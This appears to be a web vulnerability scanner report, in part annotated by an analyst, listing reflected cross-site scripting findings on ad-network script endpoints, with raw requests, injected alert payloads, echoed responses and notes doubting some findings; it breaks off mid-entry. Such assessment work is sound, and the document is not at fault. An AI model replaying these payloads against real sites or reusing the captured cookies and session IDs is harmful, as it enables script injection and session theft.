HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=88 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:37 GMT Connection: close Content-Length: 892
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='5abb7";alert(1)//4ceb5a9102f';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=5abb7";alert(1)//4ceb5a9102f;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17174'%3balert(1)//3005c8f29eb was submitted in the q parameter. This input was echoed as 17174';alert(1)//3005c8f29eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=17174'%3balert(1)//3005c8f29eb&$=&s=1&z=0.18005222734063864 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=87 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:38 GMT Connection: close Content-Length: 892
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='17174';alert(1)//3005c8f29eb';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=17174';alert(1)//3005c8f29eb;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bca3'%3balert(1)//faf01b8c8fc was submitted in the $ parameter. This input was echoed as 1bca3';alert(1)//faf01b8c8fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1219:1bca3';alert(1)//faf01b8c8fc;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFCap=1512B933,196008:1025,196206:598,169775:1219,205340|0,24,1:0,1,1:1,11,1:0,28,1;expires=Tue, 19 Apr 2011 17:14:46 GMT;path=/;domain=.zedo.com; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=79 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:46 GMT Connection: close Content-Length: 2362
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',1bca3';alert(1)//faf01b8c8fc';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=,1bca3';alert(1)//faf01b8c8fc;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2477"%3balert(1)//d617dfaf242 was submitted in the $ parameter. This input was echoed as d2477";alert(1)//d617dfaf242 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response, with the usual reservation for double-quote payloads on fm.js: the break-out is inside the zzStr literal within the if block, and on the single-line body shown below the // comment swallows that block's closing brace, so the script would fail to parse. Verify the raw line layout before rating this exploitable.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1219:d2477";alert(1)//d617dfaf242;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=79 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:46 GMT Connection: close Content-Length: 895
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',d2477";alert(1)//d617dfaf242';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=,d2477";alert(1)//d617dfaf242;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c1a7"%3balert(1)//814717ee126 was submitted in the q parameter. This input was echoed as 7c1a7";alert(1)//814717ee126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response, with the usual reservation for double-quote payloads on fm.js: the break-out is inside the zzStr literal within the if block, and on the single-line body shown below the // comment swallows that block's closing brace, so the script would fail to parse. Verify the raw line layout before rating this exploitable.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFCap=1512B933,196008:1025,196206:598,169775:1219,205340|0,24,1:0,1,1:1,11,1:0,28,1;expires=Tue, 19 Apr 2011 17:14:39 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=86 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:39 GMT Connection: close Content-Length: 2359
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='7c1a7";alert(1)//814717ee126';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=7c1a7";alert(1)//814717ee126;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adc03'%3balert(1)//0a54ecf6cff was submitted in the q parameter. This input was echoed as adc03';alert(1)//0a54ecf6cff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFCap=1512B933,196008:1025,196206:598,169775:1219,205491|0,24,1:0,1,1:1,11,1:0,28,1;expires=Tue, 19 Apr 2011 17:14:39 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=86 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:39 GMT Connection: close Content-Length: 2357
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='adc03';alert(1)//0a54ecf6cff';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=adc03';alert(1)//0a54ecf6cff;z="+Math.random();}
The value of the callback request parameter is copied into the body of the p.json response, which is served as text/javascript rather than HTML. The payload e3842<script>alert(1)</script>959784cc53a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. p.json is a JSONP endpoint (the legitimate callback in the request is _ate.ad.hpr), so this is the classic unrestricted-callback issue: an echoed <script> tag is inert in a script resource, but an attacker controls the leading bytes of a resource that other sites load as script. Confirm whether the callback is limited to identifier characters and note that the headers below do not send X-Content-Type-Options: nosniff.
Request
GET /red/psi/sites/seo101.co/p.json?callback=_ate.ad.hpre3842<script>alert(1)</script>959784cc53a&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fseo101.co%2Fxss.cxc5cde%253C%2Ftitle%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E79857da5316&ref=http%3A%2F%2Fburp%2Fshow%2F8&yvtht3 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh35.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300446510.66|1300446510.60|1300446510.1FE|1299801259.19A; dt=X; psc=4; uid=4d5af32c71c2e1a5
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 431 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 20 Mar 2011 17:28:41 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 19 Apr 2011 17:28:41 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300642121.1FE|1300642121.60|1299801259.19A|1300446510.66; Domain=.addthis.com; Expires=Tue, 19-Mar-2013 17:28:23 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sun, 20 Mar 2011 17:28:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 20 Mar 2011 17:28:41 GMT Connection: close
The value of the uid request parameter is copied into the body of the event.flow response, which is served as text/javascript rather than HTML. The payload 2d5be<script>alert(1)</script>fce206d5d8a was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The body below places the value inside a double-quoted string argument to __ADXPOSE_DRAIN_QUEUE__, so the echoed <script> tags are inert there; the context to test is a double-quote break-out (a "-alert(1)-" style payload), and the scanner's "plain text between tags" classification should be read with that in mind.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fad_type%3Diframe%26ad_size%3D160x600%26section%3D674716%26bur%3D93455%26x%3Dhttp%3A%2F%2Fwww.burstnet.com%2Fads%2Fad16597a-map.cgi%2FBCPG175405.254264.267318%2FVTS%3D2RFlO.3dTL%2FK%3DADS_T150%2FSZ%3D120X600A%7C160X600A%2FV%3D2.3S%2F%2FREDIRURL%3D&uid=0xIawmmrsYYagWK1_67725292d5be<script>alert(1)</script>fce206d5d8a&xy=0%2C0&wh=160%2C600&vchannel=191678&cid=EMB&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?n3caAJxLCgAxV2cAAAAAAFbVDwAAAAAAAAAQAAoAAAAAABAAAQABDdL2EQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD2TgUAAAAAAAIAAQAAAAAAAAAAAAAA-D8AAAAAAAD4PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACU5zluMBzPCfyPAYJZwS-weB2tSCNbGpLI1FFnAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad16597a-map.cgi%2FBCPG175405.254264.267318%2FVTS%3D2RFlO.3dTL%2FK%3DADS_T150%2FSZ%3D120X600A%7C160X600A%2FV%3D2.3S%2F%2FREDIRURL%3D,http%3A%2F%2Ftechie-buzz.com%2F%3Fref%3Dlogo,Z%3D160x600%26bur%3D93455%26s%3D674716%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad16597a%252dmap.cgi%252fBCPG175405.254264.267318%252fVTS%253d2RFlO.3dTL%252fK%253dADS%255fT150%252fSZ%253d120X600A%257c160X600A%252fV%253d2.3S%252f%252fREDIRURL%253d%26_salt%3D4137244318%26B%3D10%26u%3Dhttp%253A%252F%252Ftechie-buzz.com%252F%253Fref%253Dlogo%26r%3D0,8bf33f3c-5316-11e0-841b-003048d6d1c8 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=ADE026FF19346D77021B5BFFB8432B42; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 146 Date: Sun, 20 Mar 2011 17:26:49 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("0xIawmmrsYYagWK1_67725292d5be<script>alert(1)</script>fce206d5d8a");
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ad4e"><script>alert(1)</script>488b49970ed was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Treat it as unconfirmed until the echo is verified: the response headers below (a Last-Modified of 06 Oct 2010, a strong ETag, Accept-Ranges: bytes and a Content-Length of 6563 that is the same for the mpck and mpvc probes) are what Apache sends for a file on disk, and a static file cannot echo its query string. Compare against a request without the payload: the payload must appear in the body and Content-Length must grow by its length. If the reflection only happens client-side, through script in the creative reading location.search, it is a DOM-based issue with a different fix.
Request
GET /content/0/707/52222/44909_GEN09Products1_ebay_300x250.html?mpck=rover.ebay.com%2Frover%2F1%2F707-52222-2108-51%2F4%3Fmpt%3Dcrqigfg%252CbgymsbjuNlcq%26siteid%3D77%26adid%3D275241%26fcid%3D275241%26so_ustat%3D3%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D91847a4012e0a0aa12f4d964fff8a6ae4f62549c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D77%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D2194300057065ad4e"><script>alert(1)</script>488b49970ed&mpt=crqigfg%2CbgymsbjuNlcq&siteid=77&adid=275241&fcid=275241&so_ustat=3&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=91847a4012e0a0aa12f4d964fff8a6ae4f62549c&ir_DAP_I5=1&ir_DAP_I6=77&ir_DAP_I129=&ir_DAP_I130=&rvr_id=219430005706&mpvc=http%3A%2F%2Fadclient.uimserv.net%2Fevent.ng%2FType%3Dclick%26FlightID%3D271125%26AdID%3D690074%26TargetID%3D103547%26RawValues%3DSECTIONID%2Cgmx%2Fhomepage%2Fstart%2Fde%2F%26Redirect%3D HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.gmx.net/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=1551:23636/10433:1629/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 18:55:16 GMT Server: Apache Last-Modified: Wed, 06 Oct 2010 16:21:19 GMT ETag: "690fd5-beb-491f52add3dc0" Accept-Ranges: bytes Content-Length: 6563 Content-Type: text/html; charset=ISO-8859-1
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d4fd"><script>alert(1)</script>d088635f3c3 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response headers below are identical to those of the mpck probe apart from Date (same ETag, Last-Modified and Content-Length 6563), which is what a static file looks like; confirm that the payload is present in the body and that Content-Length grows with the payload before rating this.
Request
GET /content/0/707/52222/44909_GEN09Products1_ebay_300x250.html?mpck=rover.ebay.com%2Frover%2F1%2F707-52222-2108-51%2F4%3Fmpt%3Dcrqigfg%252CbgymsbjuNlcq%26siteid%3D77%26adid%3D275241%26fcid%3D275241%26so_ustat%3D3%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D91847a4012e0a0aa12f4d964fff8a6ae4f62549c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D77%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D219430005706&mpt=crqigfg%2CbgymsbjuNlcq&siteid=77&adid=275241&fcid=275241&so_ustat=3&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=91847a4012e0a0aa12f4d964fff8a6ae4f62549c&ir_DAP_I5=1&ir_DAP_I6=77&ir_DAP_I129=&ir_DAP_I130=&rvr_id=219430005706&mpvc=http%3A%2F%2Fadclient.uimserv.net%2Fevent.ng%2FType%3Dclick%26FlightID%3D271125%26AdID%3D690074%26TargetID%3D103547%26RawValues%3DSECTIONID%2Cgmx%2Fhomepage%2Fstart%2Fde%2F%26Redirect%3D6d4fd"><script>alert(1)</script>d088635f3c3 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.gmx.net/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=1551:23636/10433:1629/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 18:55:19 GMT Server: Apache Last-Modified: Wed, 06 Oct 2010 16:21:19 GMT ETag: "690fd5-beb-491f52add3dc0" Accept-Ranges: bytes Content-Length: 6563 Content-Type: text/html; charset=ISO-8859-1
The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a145"-alert(1)-"eb438864c80 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.71. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imp.fetchback.com
Path: /serve/fb/adtag.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7926c"-alert(1)-"bc07814a48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bac5d"-alert(1)-"7750f188b5b was submitted in the tid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 546e5"-alert(1)-"3426b7f0737 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7525"%3balert(1)//8c4da4b1adb was submitted in the l parameter. This input was echoed as e7525";alert(1)//8c4da4b1adb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /KonaGet.js?u=1300642173003&p=13764&k=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1jpNNP3&al=1&l=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1e7525"%3balert(1)//8c4da4b1adb&t=Techie+Buzz+%2C+know+your+technology+head+on&m1=technology+%2C+how+to+%2C+tips+and+tricks+%2C+software+news+%2C+software+reviews+%2C+twitter+%2C+firefox+%2C+tech+news+%2C+t&rId=0&prev_page=http%3A//burp/show/9&rl=0&1=14&mod=536936467&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1 Host: kona40.kontera.com Proxy-Connection: keep-alive Referer: http://techie-buzz.com/?ref=logo&5476f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb8b3b23ea0=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1
Response
HTTP/1.1 200 OK Content-Type: text/plain Connection: close Content-Length: 15796
The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dd26"-alert(1)-"038d1a01eb3 was submitted in the rId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /KonaGet.js?u=1300642173003&p=13764&k=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1jpNNP3&al=1&l=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1&t=Techie+Buzz+%2C+know+your+technology+head+on&m1=technology+%2C+how+to+%2C+tips+and+tricks+%2C+software+news+%2C+software+reviews+%2C+twitter+%2C+firefox+%2C+tech+news+%2C+t&rId=03dd26"-alert(1)-"038d1a01eb3&prev_page=http%3A//burp/show/9&rl=0&1=14&mod=536936467&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1 Host: kona40.kontera.com Proxy-Connection: keep-alive Referer: http://techie-buzz.com/?ref=logo&5476f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb8b3b23ea0=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1
Response
HTTP/1.1 200 OK Content-Type: text/plain Connection: close Content-Length: 23248
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed95a"%3balert(1)//a0710f25a4a was submitted in the l parameter. This input was echoed as ed95a";alert(1)//a0710f25a4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /KonaGet.js?u=1300641701477&p=13764&k=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.htmljpNNP3&al=1&l=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.htmled95a"%3balert(1)//a0710f25a4a&t=How+To+Check+PageRank+in+Google+Chrome+%3F&m1=google+chrome+%2C+software&rId=67764811449365425&rl=0&i=14&n=0&dc_aff_id=&cl=0&mp=0&rm=1&mod=8454171&rt=0&st=10&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_&1300641702329 HTTP/1.1 Host: kona5.kontera.com Proxy-Connection: keep-alive Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1
Response
HTTP/1.1 200 OK Content-Type: text/plain Connection: close Content-Length: 5375
The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3f64"-alert(1)-"ece18e1998 was submitted in the rId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
